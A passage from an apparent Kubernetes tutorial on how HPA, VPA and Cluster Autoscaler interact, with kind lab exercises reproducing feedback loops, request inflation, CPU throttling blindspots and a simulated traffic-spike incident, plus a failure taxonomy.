&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run feedback-load &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://feedback-test; sleep 0.1; done"&lt;/span&gt;

&lt;span class="c"&gt;# Monitor replica count and CPU utilization over 10+ minutes&lt;/span&gt;
watch &lt;span class="nt"&gt;-n5&lt;/span&gt; &lt;span class="s2"&gt;"kubectl get hpa feedback-test &amp;amp;&amp;amp; echo '---' &amp;amp;&amp;amp; kubectl get vpa feedback-test-vpa &amp;amp;&amp;amp; echo '---' &amp;amp;&amp;amp; kubectl top pods -l app=feedback-test"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; VPA will adjust CPU requests upward. Each time it does, the same real CPU usage becomes a smaller percentage of the new (larger) request. HPA sees lower utilization and scales in. Fewer pods means more load per pod. VPA observes higher per-pod CPU and adjusts requests further. Watch for oscillation in replica count.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Fix it — switch HPA to a non-CPU metric&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In a real cluster you'd use RPS from Prometheus. In kind, which has no custom-metrics pipeline by default, you can approximate the fix with a &lt;code&gt;ContainerResource&lt;/code&gt; metric on memory (orthogonal to CPU); the production fix is to replace the CPU-based HPA with an external/custom metric.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The correct fix: delete the CPU-based HPA, use a different signal&lt;/span&gt;
kubectl delete hpa feedback-test

&lt;span class="c"&gt;# In production, replace with:&lt;/span&gt;
&lt;span class="c"&gt;# - An ingress RPS metric via Prometheus Adapter&lt;/span&gt;
&lt;span class="c"&gt;# - A queue depth metric via KEDA&lt;/span&gt;
&lt;span class="c"&gt;# - An active connections metric from your load balancer&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod feedback-load &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment feedback-test
kubectl delete hpa feedback-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete vpa feedback-test-vpa
kubectl delete svc feedback-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Cluster Autoscaler Interaction
&lt;/h2&gt;

&lt;p&gt;HPA and VPA both create pressure on the node pool, but on different timescales and through different mechanisms.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqvyqvucy6pbwhc3a6r4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqvyqvucy6pbwhc3a6r4.png" alt="image" width="800" height="1003"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPA is fast. CA is slow.&lt;/strong&gt; Node bootstrap time is the &lt;strong&gt;dominant constant in the system&lt;/strong&gt; — every autoscaling strategy is bounded by it. The 2–4 minute bootstrap lag (longer for GPU or large instance types) sets a hard floor on how quickly new capacity can serve traffic. Any strategy that relies on CA to absorb spikes has accepted this floor as a design constraint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CA solves local schedulability, not global efficiency.&lt;/strong&gt; CA provisions enough nodes to schedule the pods that are currently &lt;code&gt;Pending&lt;/code&gt;. It does not optimize bin-packing across the cluster — it does not rebalance existing pods, consolidate fragmented nodes, or optimize for cost. This is why VPA can increase node count even when actual CPU utilization is low: the scheduler makes placement decisions based on &lt;code&gt;requests&lt;/code&gt;, not observed usage. VPA inflates requests → pods no longer fit on existing nodes → CA provisions new nodes → actual utilization stays flat or even falls. The cluster grows without the workload growing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VPA raises the node pressure threshold — and can increase your bill.&lt;/strong&gt; VPA increases &lt;code&gt;requests&lt;/code&gt;, not &lt;code&gt;limits&lt;/code&gt;. Larger requests make pods harder to schedule on existing nodes, pushing CA to provision additional capacity or larger instance types. This silently changes your node pool's instance shape economics. You may end up with fewer, larger nodes than intended — or more total nodes — without any increase in actual cluster utilization. Monitor instance type distribution and node count trends after enabling VPA in &lt;code&gt;Auto&lt;/code&gt; mode; the cost impact will appear there before it shows up in billing reports.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: Requests Drive Cost, Not Usage&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In Kubernetes, you pay for what you &lt;em&gt;reserve&lt;/em&gt;, not what you &lt;em&gt;use&lt;/em&gt;. The scheduler, the bin-packer, and CA all operate on &lt;code&gt;requests&lt;/code&gt;. VPA optimizes &lt;code&gt;requests&lt;/code&gt;. This means every VPA recommendation upward is a potential cost event — even if actual utilization is unchanged.&lt;/p&gt;
&lt;/blockquote&gt;
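&lt;p&gt;A back-of-the-envelope calculation makes the point; the node size, pod count, and request values below are illustrative assumptions, not measurements:&lt;/p&gt;

```python
import math

# Illustrative only: assumed node size, pod count, and requests.
node_allocatable_cpu = 3800   # millicores allocatable per node
pods = 30
usage_per_pod = 120           # observed millicores per pod
request_per_pod = 500         # VPA-inflated request per pod

# The scheduler and CA size the cluster by requests...
nodes_by_requests = math.ceil(pods * request_per_pod / node_allocatable_cpu)
# ...even though actual usage would fit in far fewer nodes
nodes_by_usage = math.ceil(pods * usage_per_pod / node_allocatable_cpu)

print(nodes_by_requests, nodes_by_usage)  # 4 1
```

&lt;p&gt;The cluster pays for four nodes while using roughly the capacity of one; the gap is pure reservation.&lt;/p&gt;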

&lt;p&gt;&lt;strong&gt;Autoscaling optimizes for performance first, cost second unless explicitly constrained.&lt;/strong&gt; HPA and VPA have no cost objective — they optimize to keep the metric within bounds. Over-scaling is operationally safer than under-scaling from their perspective. If cost matters (it always does), you need to encode it through &lt;code&gt;maxReplicas&lt;/code&gt;, &lt;code&gt;maxAllowed&lt;/code&gt; bounds, and node pool configuration — the autoscalers will not self-constrain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent CA overshoot&lt;/strong&gt;: If VPA evicts a large batch of pods simultaneously, the scheduler may not fit them all, triggering CA to provision capacity for a transient condition. Stage transitions between VPA &lt;code&gt;updateMode&lt;/code&gt; values, and consider CA's &lt;code&gt;--scale-down-delay-after-add&lt;/code&gt; to prevent immediate scale-in after a VPA-triggered provisioning event.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overprovisioning buffers&lt;/strong&gt; address the CA latency problem directly. Deploy a &lt;code&gt;Deployment&lt;/code&gt; of low-priority placeholder pods (using a &lt;code&gt;PriorityClass&lt;/code&gt; with a negative value) sized to your expected burst headroom. These pods consume cluster capacity when idle, keeping nodes warm and schedulable. When real pods scale out, the scheduler evicts the placeholder pods to make room — no CA provisioning required. The cost is always-on reserved capacity; the benefit is eliminating the 2–4 minute bootstrap lag from your scaling critical path.&lt;/p&gt;
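&lt;p&gt;A minimal sketch of such a buffer, assuming a target of two CPUs of burst headroom. The names, priority value, and sizes here are illustrative; &lt;code&gt;registry.k8s.io/pause&lt;/code&gt; is the conventional no-op placeholder image:&lt;/p&gt;

```yaml
# Illustrative overprovisioning buffer. Names and sizes are assumptions;
# size replicas * requests to your expected burst headroom.
apiVersion: scheduling.k8s.io/v1
kind: PriorityClass
metadata:
  name: overprovisioning
value: -10            # negative: evicted before any real workload
globalDefault: false
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: capacity-buffer
spec:
  replicas: 4         # 4 x 500m = 2 CPUs of warm headroom
  selector:
    matchLabels:
      app: capacity-buffer
  template:
    metadata:
      labels:
        app: capacity-buffer
    spec:
      priorityClassName: overprovisioning
      containers:
      - name: pause
        image: registry.k8s.io/pause:3.9
        resources:
          requests:
            cpu: 500m
            memory: 128Mi
```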




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 9: Trigger Pending Pods via VPA Request Inflation
&lt;/h3&gt;

&lt;p&gt;In kind, nodes have fixed resources. You can reproduce the VPA-inflates-requests-causing-unschedulable scenario by setting &lt;code&gt;maxAllowed&lt;/code&gt; to values larger than your kind node's allocatable capacity.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# First, check your kind nodes' allocatable CPU and memory&lt;/span&gt;
kubectl describe nodes | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A5&lt;/span&gt; &lt;span class="s2"&gt;"Allocatable:"&lt;/span&gt;

&lt;span class="c"&gt;# Deploy a tight workload&lt;/span&gt;
kubectl create deployment inflate-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;nginx
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment inflate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m,memory&lt;span class="o"&gt;=&lt;/span&gt;64Mi &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m,memory&lt;span class="o"&gt;=&lt;/span&gt;128Mi
kubectl scale deployment inflate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3

&lt;span class="c"&gt;# Create VPA with maxAllowed far exceeding available per-node headroom&lt;/span&gt;
&lt;span class="c"&gt;# Adjust these numbers to be just over your node's allocatable / 3&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: inflate-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: inflate-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: nginx
      minAllowed:
        cpu: 800m      # Intentionally large — adjust to exceed your node headroom
        memory: 512Mi
      maxAllowed:
        cpu: 2
        memory: 2Gi
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Watch for Pending pods&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;inflate-test &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;

&lt;span class="c"&gt;# After VPA evicts and re-creates pods with large requests, check for Pending&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; &lt;span class="nv"&gt;reason&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;FailedScheduling &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; After VPA injects the inflated requests, some pods may enter &lt;code&gt;Pending&lt;/code&gt; state because no single node has enough remaining allocatable resources. In a real cluster, this is the trigger for Cluster Autoscaler to provision new nodes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete deployment inflate-test
kubectl delete vpa inflate-test-vpa
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Operational Gotchas
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;VPA's OOM learning problem&lt;/strong&gt;: VPA recommends based on observed usage. If your application hasn't experienced peak load during the observation window, VPA will under-recommend memory. When an OOMKill does occur, the recommender reacts by adding a bumped-up memory sample, but that learning is reactive: the pod has already died at least once. Always set &lt;code&gt;minAllowed&lt;/code&gt; bounds anchored to values from load testing, not from observed idle-state usage.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CPU throttling blindspot&lt;/strong&gt;: If your containers have tight CPU limits, &lt;code&gt;container_cpu_cfs_throttled_seconds_total&lt;/code&gt; will be high but observed CPU usage will appear low. VPA will recommend lower CPU requests, worsening the throttling. Always check the throttling metric before acting on VPA CPU recommendations.&lt;/p&gt;
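&lt;p&gt;If you have node access, the raw signal behind that counter is the cgroup's &lt;code&gt;cpu.stat&lt;/code&gt; file. The sketch below uses the cgroup v2 field names; the sample values themselves are invented:&lt;/p&gt;

```python
# Two cpu.stat snapshots taken ~60s apart. The counter values here are
# invented for illustration; the field names come from cgroup v2.
t0 = {"nr_periods": 12000, "nr_throttled": 200, "throttled_usec": 1_000_000}
t1 = {"nr_periods": 12600, "nr_throttled": 560, "throttled_usec": 19_000_000}

periods = t1["nr_periods"] - t0["nr_periods"]        # CFS periods elapsed
throttled = t1["nr_throttled"] - t0["nr_throttled"]  # periods that hit the limit
ratio = throttled / periods

print(f"{ratio:.0%} of CFS periods throttled")  # 60% of CFS periods throttled
```

&lt;p&gt;Sustained throttling above a few percent means observed usage is being clipped by the limit. Treat VPA's CPU recommendation as a floor in that case, not a target.&lt;/p&gt;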

&lt;p&gt;&lt;strong&gt;Memory target at p95 is not a ceiling&lt;/strong&gt;: VPA recommends memory at p95, meaning 5% of observed samples exceeded the recommendation. For workloads with heavy GC or periodic batch operations, the tail can be large. Setting &lt;code&gt;maxAllowed&lt;/code&gt; memory without headroom above p95 will still produce OOMKills at peak.&lt;/p&gt;
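&lt;p&gt;A toy illustration of the tail problem; the sample values are invented, but the arithmetic is the point:&lt;/p&gt;

```python
# 100 memory samples (MiB): mostly steady, with a periodic batch spike.
samples = [100] * 90 + [180] * 5 + [400, 420, 450, 480, 512]
samples.sort()

p95 = samples[94]      # nearest-rank 95th percentile of 100 samples
peak = max(samples)

print(p95, peak)  # 180 512
```

&lt;p&gt;A &lt;code&gt;maxAllowed&lt;/code&gt; set at the 180MiB p95 still OOMKills every time the 512MiB spike arrives.&lt;/p&gt;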




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 10: Inspect VPA Recommendations Under CPU Throttling
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates the CPU throttling blindspot: tight limits cause VPA to recommend &lt;em&gt;less&lt;/em&gt; CPU, creating a vicious cycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy with intentionally tight CPU limits&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: throttle-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: throttle-test
  template:
    metadata:
      labels:
        app: throttle-test
    spec:
      containers:
      - name: app
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 200m
          limits:
            cpu: 210m    # Limit barely above request — maximum throttling
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do yes &amp;gt;/dev/null; done"  # 100% CPU burn
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Attach a VPA&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: throttle-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: throttle-test
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: app
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 4
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Check throttling and VPA recommendation&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check actual CPU usage — it will appear bounded by the limit&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;throttle-test

&lt;span class="c"&gt;# After 5+ minutes, check VPA recommendation&lt;/span&gt;
kubectl describe vpa throttle-test-vpa | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A10&lt;/span&gt; &lt;span class="s2"&gt;"Container Recommendations"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Even though the container is burning 100% CPU, &lt;code&gt;kubectl top&lt;/code&gt; shows only ~210m (the limit). VPA sees this capped observation and may recommend a value &lt;em&gt;near or below&lt;/em&gt; the current request. In a real environment, you'd check &lt;code&gt;container_cpu_cfs_throttled_seconds_total&lt;/code&gt; in Prometheus to confirm throttling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete deployment throttle-test
kubectl delete vpa throttle-test-vpa
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Autoscaling Failure Taxonomy
&lt;/h2&gt;

&lt;p&gt;Production autoscaling incidents tend to fall into a small number of reusable classes. Naming them makes debugging faster — you can pattern-match a symptom to a class before you have the full picture.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Failure Class&lt;/th&gt;
&lt;th&gt;Root Cause&lt;/th&gt;
&lt;th&gt;Observable Symptom&lt;/th&gt;
&lt;th&gt;Canonical Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Lag-induced saturation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reaction pipeline slower than load ramp&lt;/td&gt;
&lt;td&gt;High error rate for 90–120s before replicas increase&lt;/td&gt;
&lt;td&gt;CPU HPA at 80% target + sudden 3× traffic spike&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signal distortion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metric ≠ actual load&lt;/td&gt;
&lt;td&gt;VPA recommends lower CPU despite high latency&lt;/td&gt;
&lt;td&gt;CPU throttling suppresses observed usage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Control loop interference&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Two loops reacting to the same signal&lt;/td&gt;
&lt;td&gt;Oscillating replica count without load change&lt;/td&gt;
&lt;td&gt;CPU-based HPA + VPA Auto mode running simultaneously&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Capacity illusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Scheduler or CA lag hides true capacity deficit&lt;/td&gt;
&lt;td&gt;Pods Pending despite "sufficient" cluster capacity&lt;/td&gt;
&lt;td&gt;VPA evicts pods during CA bootstrap window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Overcorrection / oscillation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Aggressive scale policies or too-low stabilization window&lt;/td&gt;
&lt;td&gt;Replica count thrashes up and down under steady load&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;scaleDown.stabilizationWindowSeconds: 0&lt;/code&gt; on noisy metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bound-induced blindness&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;maxReplicas&lt;/code&gt; or &lt;code&gt;maxAllowed&lt;/code&gt; set too conservatively&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ScalingLimited&lt;/code&gt; condition True; SLO degraded but HPA appears healthy&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;maxReplicas: 5&lt;/code&gt; on a service that needs 20 during peak&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When an autoscaling incident starts, the first question is: which class is this? The answer determines whether you look at metric freshness, HPA/VPA coupling, scheduler events, or policy configuration.&lt;/p&gt;





&lt;h2&gt;
  
  
  Production Incident Pattern: The Black Friday Failure Mode
&lt;/h2&gt;

&lt;p&gt;Consider a typical API service under sudden high load:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Traffic spikes 5× over 2 minutes.&lt;/li&gt;
&lt;li&gt;CPU metrics are ~30s stale. HPA does not yet see elevated utilization.&lt;/li&gt;
&lt;li&gt;HPA eventually fires — but CPU target was set at 80%. The service is already saturated before the first new pod starts.&lt;/li&gt;
&lt;li&gt;VPA, running in &lt;code&gt;Auto&lt;/code&gt; mode, decides this is a good time to evict two pods to update their memory requests. Pod count temporarily drops.&lt;/li&gt;
&lt;li&gt;The evicted pods cannot fit on existing nodes due to larger VPA-requested resources. CA begins provisioning — with a 2–4 minute bootstrap lag.&lt;/li&gt;
&lt;li&gt;By the time new capacity is available, the load spike has peaked and is declining. CA provisions nodes that are no longer needed.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The fix is not a single knob. It requires: external metrics for HPA (RPS instead of CPU), VPA in &lt;code&gt;Initial&lt;/code&gt; mode during high-risk windows, CA warm pools or overprovisioning buffers, and load-tested &lt;code&gt;minAllowed&lt;/code&gt; VPA bounds.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 11: Simulate the Black Friday Failure Mode End-to-End
&lt;/h3&gt;

&lt;p&gt;This pulls together HPA, VPA, and the scheduler to reproduce the scenario.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy the reference "API service"&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api-service
spec:
  replicas: 2
  selector:
    matchLabels:
      app: api-service
  template:
    metadata:
      labels:
        app: api-service
    spec:
      containers:
      - name: api
        image: registry.k8s.io/hpa-example
        ports:
        - containerPort: 80
        resources:
          requests:
            cpu: 200m
            memory: 64Mi
          limits:
            cpu: 500m
            memory: 128Mi
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;kubectl expose deployment api-service &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# HPA with 80% CPU target (the anti-pattern)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: api-service
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  minReplicas: 2
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 80   # Anti-pattern: too high, no headroom
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# VPA in Auto mode (will evict during the spike)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: api-service-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  updatePolicy:
    updateMode: "Auto"
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Apply a sudden 5× load spike&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Spike started at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://api-service; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Monitor everything simultaneously&lt;/span&gt;
watch &lt;span class="nt"&gt;-n3&lt;/span&gt; &lt;span class="s2"&gt;"
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe over ~10 minutes:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Initial delay before HPA fires (metric lag + sync period)&lt;/li&gt;
&lt;li&gt;VPA evicting a pod during the spike (pod count temporarily drops)&lt;/li&gt;
&lt;li&gt;HPA and VPA interfering: VPA's new requests shift the utilization ratio HPA scales on, changing the replica decision&lt;/li&gt;
&lt;li&gt;Scheduling pressure if replacement pods come back with larger requests after eviction&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Apply the fix and compare&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Stop the spike&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Fix 1: Lower HPA CPU target to leave headroom&lt;/span&gt;
kubectl patch hpa api-service &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50'&lt;/span&gt;

&lt;span class="c"&gt;# Fix 2: Switch VPA to Initial mode (no evictions of running pods)&lt;/span&gt;
kubectl patch vpa api-service-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  updatePolicy:
    updateMode: "Initial"'&lt;/span&gt;

